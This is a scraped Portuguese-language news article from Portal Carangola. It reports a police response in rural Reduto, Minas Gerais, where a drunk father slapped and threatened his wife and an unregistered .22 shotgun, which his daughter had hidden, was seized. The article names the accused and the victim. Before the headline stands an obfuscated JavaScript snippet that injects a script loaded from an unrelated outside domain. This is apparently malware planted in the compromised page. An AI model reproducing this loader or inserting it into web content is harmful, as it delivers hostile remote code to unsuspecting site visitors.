;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Reduto: Pai ameaça família e PM apreende arma de fogo. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Reduto: Pai ameaça família e PM apreende arma de fogo.

Reportagem 1Guarnição PM composta pelos policiais militares Sargento Luiz Narcizo, Soldado Cyro e Soldado Duarte foram acionados através do celular da PM pela menor D. D. G. (14 anos), a qual informou que seu pai de nome José Carlos Gomes, agrediu e ameaçou Lacir Donato, mãe de D., com tapas, na residência da família, situada no Córrego Sinceridade, s/nº, Zona Rural de Reduto-MG.
D. complementou afirmando que não era a primeira vez que seu pai agredia sua mãe, todavia, seria a primeira vez que a PM foi acionada e, pelo fato do mesmo estar bêbado, ela que havia acabado de chegar da escola, entrou em casa e escondeu a espingarda de seu pai, com receio que o mesmo pegasse a arma e cometesse algo pior.
Imediatamente a viatura de Reduto, deslocou para o local dos fatos e, na casa da vizinha onde as vítimas estavam, foi realizado contato com os outros filhos do casal, além de D. e Lacir, tendo esta confirmada que foi agredida no rosto com tapas, tendo todos informado que José encontrava-se no interior da residência rural que reside.
No local, José foi chamado, tendo prontamente atendido. Em verbalização com o mesmo, o qual se encontrava calmo, foi percebido sinais de embriaguez devido ao hálito etílico do mesmo.
Perguntado se possui arma de fogo, o autor disse que não, todavia, de posse da informação da solicitante e de onde a mesma teria escondido a arma, os PMS entraram na residência com a autorização de José tendo sido encontrada a Espingarda calibre .22 sob a cama de um dos filhos, bem como uma caixa com 32 munições intactas do mesmo calibre próximo a arma.
José confirmou não possuir nenhum registro da mesma.
A vítima Lacir foi atendida no UPA em Manhuaçu.
A José foi dado voz de prisão pelo crime de posse irregular de arma de fogo, agressão e ameaça, tendo sido apresentado a Delegacia de Polícia Civil em Manhuaçu.
Informação: Soldado Duarte

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.